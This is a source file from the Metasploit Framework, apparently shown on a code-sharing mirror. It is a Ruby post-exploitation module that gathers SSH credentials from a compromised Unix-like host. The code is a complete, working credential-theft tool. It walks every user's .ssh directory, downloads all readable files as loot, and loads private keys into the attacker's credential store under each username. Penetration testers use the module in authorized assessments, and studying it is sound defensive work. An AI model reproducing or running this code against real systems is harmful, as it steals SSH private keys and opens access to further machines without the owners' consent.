Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/ssh_creds.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'sshkey'
7
8
class MetasploitModule < Msf::Post
9
include Msf::Post::File
10
include Msf::Post::Unix
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',
17
'Description' => %q{
18
This module will collect the contents of all users' .ssh directories on the targeted
19
machine. Additionally, known_hosts and authorized_keys and any other files are also
20
downloaded. This module is largely based on firefox_creds.rb.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => ['Jim Halfpenny'],
24
'Platform' => %w[bsd linux osx unix],
25
'SessionTypes' => ['meterpreter', 'shell' ],
26
'Compat' => {
27
'Meterpreter' => {
28
'Commands' => %w[
29
stdapi_fs_ls
30
stdapi_fs_separator
31
]
32
}
33
},
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [],
37
'Reliability' => []
38
}
39
)
40
)
41
end
42
43
def run
44
print_status('Finding .ssh directories')
45
paths = enum_user_directories.map { |d| d + '/.ssh' }
46
# Array#select! is only in 1.9
47
paths = paths.select { |d| directory?(d) }
48
49
if paths.nil? || paths.empty?
50
print_error('No users found with a .ssh directory')
51
return
52
end
53
54
print_status("Looting #{paths.count} .ssh directories")
55
download_loot(paths)
56
end
57
58
def download_loot(paths)
59
paths.each do |path|
60
path.chomp!
61
62
print_status("Looting #{path} directory")
63
64
unless executable?(path)
65
print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")
66
next
67
end
68
69
if session.type == 'meterpreter'
70
sep = session.fs.file.separator
71
files = session.fs.dir.entries(path)
72
else
73
# Guess, but it's probably right
74
sep = '/'
75
files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
76
end
77
path_array = path.split(sep)
78
path_array.pop
79
user = path_array.pop
80
files.each do |file|
81
next if ['.', '..'].include?(file)
82
83
file_path = "#{path}#{sep}#{file}"
84
85
unless readable?(file_path)
86
print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")
87
next
88
end
89
90
data = read_file("#{path}#{sep}#{file}")
91
file = file.split(sep).last
92
93
loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
94
print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
95
96
# store only ssh private keys
97
next if SSHKey.valid_ssh_public_key? data
98
99
begin
100
key = SSHKey.new(data, passphrase: '')
101
102
credential_data = {
103
origin_type: :session,
104
session_id: session_db_id,
105
post_reference_name: refname,
106
private_type: :ssh_key,
107
private_data: key.key_object.to_s,
108
username: user,
109
workspace_id: myworkspace_id
110
}
111
112
create_credential(credential_data)
113
rescue OpenSSL::OpenSSLError => e
114
print_error("Could not load SSH Key: #{e.message}")
115
end
116
end
117
end
118
end
119
end
120
121